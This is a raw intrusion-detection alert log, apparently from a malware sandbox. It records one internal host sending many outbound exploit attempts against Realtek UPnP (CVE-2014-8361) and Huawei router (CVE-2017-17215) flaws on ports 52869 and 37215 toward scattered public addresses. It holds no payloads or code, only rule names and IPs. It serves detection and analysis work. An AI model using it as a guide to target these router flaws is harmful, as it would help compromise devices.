                                      07/20/24-23:01:24.724267TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4284852869192.168.2.2375.178.59.59
                                      07/20/24-23:01:42.928503TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5985852869192.168.2.23167.230.66.89
                                      07/20/24-23:02:02.601575TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5728252869192.168.2.2319.154.207.41
                                      07/20/24-23:00:57.222523TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4944637215192.168.2.23199.229.94.109
                                      07/20/24-23:01:49.555689TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3501652869192.168.2.23147.48.69.29
                                      07/20/24-23:01:04.114673TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3556237215192.168.2.2341.54.147.121
                                      07/20/24-23:01:34.050672TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5048237215192.168.2.23197.124.62.106
                                      07/20/24-23:01:20.126052TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3874237215192.168.2.23157.202.161.192
                                      07/20/24-23:01:42.914230TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615238652869192.168.2.2367.74.166.37
                                      07/20/24-23:01:46.439689TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23516452869192.168.2.23165.21.55.96
                                      07/20/24-23:01:00.637175TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5694037215192.168.2.2341.144.198.102
                                      07/20/24-23:01:05.126622TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614254452869192.168.2.23174.56.72.194
                                      07/20/24-23:01:08.559170TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24564852869192.168.2.23206.208.92.27
                                      07/20/24-23:01:27.658221TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5894437215192.168.2.2341.116.229.3
                                      07/20/24-23:01:52.720668TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4544252869192.168.2.2349.245.141.79
                                      07/20/24-23:02:11.380126TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614788852869192.168.2.23130.112.45.111
                                      07/20/24-23:01:41.912337TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4254852869192.168.2.2335.204.82.212
                                      07/20/24-23:01:20.150638TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5594837215192.168.2.23197.57.93.26
                                      07/20/24-23:01:31.317668TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23501052869192.168.2.23181.111.14.150
                                      07/20/24-23:01:44.611556TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614713452869192.168.2.2357.16.142.227
                                      07/20/24-23:01:44.405053TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3380852869192.168.2.23153.201.149.50
                                      07/20/24-23:01:02.119631TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4798437215192.168.2.23197.253.103.224
                                      07/20/24-23:01:42.751824TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613724052869192.168.2.23107.79.192.172
                                      07/20/24-23:01:52.343511TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5295052869192.168.2.23184.89.50.234
                                      07/20/24-23:02:09.668312TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4584252869192.168.2.23175.222.148.23
                                      07/20/24-23:01:44.338159TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25556852869192.168.2.2353.50.131.136
                                      07/20/24-23:01:42.187124TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613601052869192.168.2.23186.68.76.128
                                      07/20/24-23:01:44.895849TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25143852869192.168.2.23120.63.90.68
                                      07/20/24-23:01:52.546535TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614505652869192.168.2.2338.184.175.46
                                      07/20/24-23:01:41.389908TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5845452869192.168.2.23170.207.21.198
                                      07/20/24-23:01:08.588009TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24310652869192.168.2.23104.152.150.214
                                      07/20/24-23:01:02.045685TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3383837215192.168.2.2341.101.142.15
                                      07/20/24-23:01:11.820979TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4919437215192.168.2.23108.25.203.240
                                      07/20/24-23:01:41.286911TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615691052869192.168.2.23174.56.140.249
                                      07/20/24-23:01:20.096752TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3710437215192.168.2.2348.147.199.167
                                      07/20/24-23:01:43.380019TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5218052869192.168.2.23108.216.198.203
                                      07/20/24-23:01:08.595072TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5737452869192.168.2.23162.117.132.232
                                      07/20/24-23:01:41.345953TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614542252869192.168.2.23219.124.32.18
                                      07/20/24-23:01:47.966822TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614123252869192.168.2.23171.220.105.123
                                      07/20/24-23:01:25.002144TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614179652869192.168.2.23178.214.207.137
                                      07/20/24-23:01:44.175701TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613873052869192.168.2.23190.104.185.79
                                      07/20/24-23:01:41.354322TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3538052869192.168.2.23125.246.56.225
                                      07/20/24-23:01:27.660100TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4095437215192.168.2.23171.152.33.197
                                      07/20/24-23:01:41.456456TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5162452869192.168.2.23131.22.29.107
                                      07/20/24-23:01:04.082385TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5798837215192.168.2.23197.33.104.96
                                      07/20/24-23:01:24.883171TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3314637215192.168.2.23108.136.107.241
                                      07/20/24-23:01:04.098909TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4633037215192.168.2.2341.250.23.107
                                      07/20/24-23:01:24.944299TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6074237215192.168.2.23197.252.66.96
                                      07/20/24-23:01:04.244899TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4503237215192.168.2.23140.185.125.173
                                      07/20/24-23:01:52.428503TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613308652869192.168.2.2352.24.218.23
                                      07/20/24-23:01:42.839255TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25108652869192.168.2.23145.203.252.98
                                      07/20/24-23:01:04.118165TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3356237215192.168.2.23157.254.221.242
                                      07/20/24-23:01:13.047601TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4296052869192.168.2.2347.250.162.49
                                      07/20/24-23:01:49.271801TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615461052869192.168.2.2388.29.47.240
                                      07/20/24-23:01:02.349095TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3479652869192.168.2.23171.201.20.41
                                      07/20/24-23:01:04.757513TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3542052869192.168.2.2368.46.168.107
                                      07/20/24-23:01:24.889164TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5869037215192.168.2.23157.128.212.188
                                      07/20/24-23:01:43.697010TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24007652869192.168.2.23138.38.220.62
                                      07/20/24-23:02:05.311710TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4682652869192.168.2.2347.224.141.66
                                      07/20/24-23:01:52.740670TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3790252869192.168.2.2320.232.50.163
                                      07/20/24-23:01:01.139063TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4346652869192.168.2.23189.75.86.189
                                      07/20/24-23:01:27.651332TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5707637215192.168.2.23197.216.140.107
                                      07/20/24-23:01:46.810790TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24535052869192.168.2.23169.129.60.246
                                      07/20/24-23:01:59.992285TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3724052869192.168.2.2386.115.200.136
                                      07/20/24-23:01:00.638418TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3842437215192.168.2.2341.90.83.142
                                      07/20/24-23:01:56.091033TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5291052869192.168.2.23217.227.78.54
                                      07/20/24-23:01:20.124695TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4254637215192.168.2.2346.121.151.152
                                      07/20/24-23:01:47.818739TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4459452869192.168.2.2393.74.58.220
                                      07/20/24-23:01:08.621030TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4004252869192.168.2.23137.195.128.162
                                      07/20/24-23:01:27.651332TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6016037215192.168.2.23130.180.210.230
                                      07/20/24-23:01:20.593640TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25079452869192.168.2.2390.205.64.234
                                      07/20/24-23:01:45.148866TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4128252869192.168.2.23208.111.2.186
                                      07/20/24-23:00:59.191389TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5562037215192.168.2.23157.113.182.239
                                      07/20/24-23:01:45.331813TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3531052869192.168.2.23148.216.25.247
                                      07/20/24-23:01:50.257796TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4152852869192.168.2.2387.152.13.65
                                      07/20/24-23:01:45.519460TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23647652869192.168.2.23147.236.68.25
                                      07/20/24-23:01:12.888802TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25298452869192.168.2.2362.245.86.200
                                      07/20/24-23:01:57.885722TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615524052869192.168.2.2399.190.226.142
                                      07/20/24-23:01:02.046626TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5474837215192.168.2.2382.113.201.213
                                      07/20/24-23:01:41.303421TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5049252869192.168.2.2368.175.73.118
                                      07/20/24-23:01:45.580167TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4096052869192.168.2.2375.147.225.215
                                      07/20/24-23:02:01.681802TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4988852869192.168.2.23190.157.219.101
                                      07/20/24-23:01:40.334934TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3578037215192.168.2.23157.69.245.123
                                      07/20/24-23:01:06.957274TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4078637215192.168.2.23157.246.19.232
                                      07/20/24-23:01:04.064240TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4442237215192.168.2.23157.131.49.54
                                      07/20/24-23:01:46.072415TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4998052869192.168.2.2392.210.119.212
                                      07/20/24-23:01:52.976222TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4986252869192.168.2.2387.107.52.197
                                      07/20/24-23:01:20.175900TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3309637215192.168.2.23197.118.77.21
                                      07/20/24-23:01:00.639011TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5038437215192.168.2.2341.203.224.247
                                      07/20/24-23:00:57.222229TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5473837215192.168.2.2341.9.160.205
                                      07/20/24-23:01:42.692028TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5798452869192.168.2.2312.110.126.98
                                      07/20/24-23:01:04.053605TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3884637215192.168.2.23157.57.185.177
                                      07/20/24-23:01:42.651912TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23373252869192.168.2.23131.104.254.70
                                      07/20/24-23:01:10.633889TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615426452869192.168.2.2357.137.225.59
                                      07/20/24-23:01:40.290003TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4401037215192.168.2.23220.248.218.41
                                      07/20/24-23:02:05.544188TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3367252869192.168.2.23108.147.254.33
                                      07/20/24-23:01:03.215254TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614280452869192.168.2.23177.27.5.34
                                      07/20/24-23:01:41.165469TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615874452869192.168.2.23118.130.245.154
                                      07/20/24-23:01:50.395253TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5600252869192.168.2.2398.196.109.144
                                      07/20/24-23:00:57.220999TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4109437215192.168.2.23157.66.238.102
                                      07/20/24-23:01:27.749737TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5290637215192.168.2.23218.132.145.180
                                      07/20/24-23:01:08.597662TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25501052869192.168.2.23139.37.94.236
                                      07/20/24-23:01:27.729822TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4749437215192.168.2.23157.212.32.19
                                      07/20/24-23:01:01.861410TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615522452869192.168.2.23162.63.105.168
                                      07/20/24-23:01:46.407113TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3994652869192.168.2.23150.76.139.116
                                      07/20/24-23:01:31.320679TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6089052869192.168.2.2379.157.163.186
                                      07/20/24-23:01:02.070492TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3688637215192.168.2.23157.180.36.121
                                      07/20/24-23:01:44.841232TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615734252869192.168.2.23158.186.31.24
                                      07/20/24-23:01:41.974742TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25437852869192.168.2.23212.24.31.41
                                      07/20/24-23:01:46.661049TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5862452869192.168.2.23165.29.53.230
                                      07/20/24-23:01:27.749737TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4709837215192.168.2.23197.163.214.36
                                      07/20/24-23:01:44.862542TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614499052869192.168.2.23169.129.60.246
                                      07/20/24-23:01:44.996260TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5865252869192.168.2.2350.61.91.2
                                      07/20/24-23:01:06.990165TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4463437215192.168.2.23197.78.251.102
                                      07/20/24-23:01:47.987185TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23410652869192.168.2.23140.138.195.141
                                      07/20/24-23:01:53.503242TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615497852869192.168.2.2313.253.184.187
                                      07/20/24-23:01:24.910426TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4568637215192.168.2.23157.8.149.199
                                      07/20/24-23:01:45.660608TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3502652869192.168.2.23130.184.173.22
                                      07/20/24-23:01:04.098080TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3851837215192.168.2.2325.81.242.112
                                      07/20/24-23:01:42.718842TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613718252869192.168.2.23165.221.172.161
                                      07/20/24-23:01:02.065822TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614928252869192.168.2.2370.239.61.12
                                      07/20/24-23:01:11.635828TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4257437215192.168.2.23157.185.20.188
                                      07/20/24-23:01:43.540053TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25974252869192.168.2.23207.56.45.233
                                      07/20/24-23:01:02.048367TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4254237215192.168.2.23157.219.32.62
                                      07/20/24-23:01:21.915268TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5439037215192.168.2.2341.141.66.103
                                      07/20/24-23:01:08.571946TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4364652869192.168.2.239.190.28.75
                                      07/20/24-23:01:40.334934TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5766237215192.168.2.23197.188.106.107
                                      07/20/24-23:01:48.275988TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3973252869192.168.2.2389.150.205.193
                                      07/20/24-23:01:21.954501TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4321237215192.168.2.23157.226.178.202
                                      07/20/24-23:01:00.633744TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3764237215192.168.2.23157.54.130.2
                                      07/20/24-23:01:31.311906TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25873052869192.168.2.2359.198.200.174
                                      07/20/24-23:01:46.855307TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613617652869192.168.2.23211.143.251.133
                                      07/20/24-23:02:35.459810TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613468652869192.168.2.23173.18.107.141
                                      07/20/24-23:01:42.984532TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5740452869192.168.2.2335.221.171.171
                                      07/20/24-23:01:47.934101TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4224452869192.168.2.23171.195.37.248
                                      07/20/24-23:01:59.030102TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613611652869192.168.2.23159.45.241.196
                                      07/20/24-23:02:21.324806TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4621452869192.168.2.2327.91.150.196
                                      07/20/24-23:01:42.687128TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23820052869192.168.2.23168.18.159.220
                                      07/20/24-23:01:54.367854TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4113852869192.168.2.23133.36.37.101
                                      07/20/24-23:01:27.650871TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5213637215192.168.2.23197.178.175.16
                                      07/20/24-23:01:02.716646TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4633852869192.168.2.23210.116.25.221
                                      07/20/24-23:01:45.775798TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5156852869192.168.2.2362.188.56.156
                                      07/20/24-23:01:55.974605TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25330652869192.168.2.23111.101.151.97
                                      07/20/24-23:01:41.549051TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5069652869192.168.2.2388.132.0.162
                                      07/20/24-23:01:41.263057TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5998452869192.168.2.23137.127.2.156
                                      07/20/24-23:01:42.699598TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4381052869192.168.2.23113.209.32.105
                                      07/20/24-23:01:42.704267TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4440052869192.168.2.23167.4.219.92
                                      07/20/24-23:00:59.157444TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5263237215192.168.2.23197.12.37.150
                                      07/20/24-23:01:44.957555TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4140252869192.168.2.23155.96.29.107
                                      07/20/24-23:01:44.405053TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24960852869192.168.2.2318.181.232.193
                                      07/20/24-23:01:42.033190TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4547252869192.168.2.2350.3.243.177
                                      07/20/24-23:01:52.116386TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614778852869192.168.2.23126.2.96.116
                                      07/20/24-23:01:34.048825TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5628437215192.168.2.23197.81.234.224
                                      07/20/24-23:01:49.463055TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4222052869192.168.2.23126.245.117.149
                                      07/20/24-23:01:50.001369TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614539452869192.168.2.2360.33.175.153
                                      07/20/24-23:01:44.440143TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615576452869192.168.2.23124.24.223.164
                                      07/20/24-23:01:40.285038TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4621037215192.168.2.23197.29.110.76
                                      07/20/24-23:01:51.624541TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4820252869192.168.2.23197.243.125.183
                                      07/20/24-23:01:20.181938TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3688637215192.168.2.23197.57.234.7
                                      07/20/24-23:01:44.409097TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615291652869192.168.2.2334.198.8.37
                                      07/20/24-23:01:47.641942TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4634452869192.168.2.23106.236.204.67
                                      07/20/24-23:01:51.743446TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25673052869192.168.2.2390.237.72.71
                                      07/20/24-23:01:43.014738TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4404852869192.168.2.2349.238.106.168
                                      07/20/24-23:01:44.038410TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5411452869192.168.2.23173.71.226.225
                                      07/20/24-23:01:20.144672TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5550237215192.168.2.2341.241.151.239
                                      07/20/24-23:01:49.901282TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5483452869192.168.2.23105.93.17.46
                                      07/20/24-23:01:53.344252TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613750452869192.168.2.2340.95.139.12
                                      07/20/24-23:01:57.795137TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615413052869192.168.2.23129.174.206.130
                                      07/20/24-23:01:54.515977TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615593652869192.168.2.2351.202.3.15
                                      07/20/24-23:02:04.640459TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23295852869192.168.2.23205.96.176.194
                                      07/20/24-23:01:08.572197TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25529652869192.168.2.23173.57.134.38
                                      07/20/24-23:01:02.048113TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5745637215192.168.2.23197.90.236.107
                                      07/20/24-23:01:14.090830TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6064437215192.168.2.23157.45.181.132
                                      07/20/24-23:01:14.113390TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6061037215192.168.2.23140.142.252.32
                                      07/20/24-23:01:40.331150TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5800437215192.168.2.2341.39.175.234
                                      07/20/24-23:01:46.384516TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5692652869192.168.2.23126.192.25.7
                                      07/20/24-23:01:43.030153TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5865452869192.168.2.23143.69.193.236
                                      07/20/24-23:01:20.131340TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5397637215192.168.2.2317.114.197.205
